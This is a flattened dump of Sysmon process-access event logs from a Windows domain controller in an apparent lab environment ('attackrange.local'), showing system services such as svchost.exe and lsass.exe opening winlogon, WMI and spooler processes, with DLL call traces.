13:29:53.967{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009527Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.967{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009526Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.967{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+6260e|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000009525Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.967{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-0F00-000000009A01}1124C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+625bd|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000009524Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.967{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009523Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.951{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009522Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.951{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2B00-000000009A01}2680C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009521Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.951{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009520Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.951{08A6967A-4288-6000-0F00-000000009A01}11241288C:\Windows\System32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\termsrv.dll+a1ad7|c:\windows\system32\termsrv.dll+6b17d|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009519Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.951{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009518Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.951{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009517Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.951{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009516Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.951{08A6967A-4288-6000-1000-000000009A01}11361212C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x147aC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\themeservice.dll+3de3|c:\windows\system32\themeservice.dll+26c0|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009515Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.951{08A6967A-4288-6000-1000-000000009A01}11361600C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009514Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.951{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009513Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.951{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009512Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.951{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009511Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.951{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009510Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.951{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009509Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.951{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009508Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.951{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009507Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.951{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+396a|c:\windows\system32\SYSNTFY.dll+1fc3|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+52568|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009506Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.951{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50d64|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009505Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.951{08A6967A-4286-6000-0B00-000000009A01}852100C:\Windows\system32\lsass.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50d64|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009504Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.951{08A6967A-4288-6000-1000-000000009A01}11361212C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50d64|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009503Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.826{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009502Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 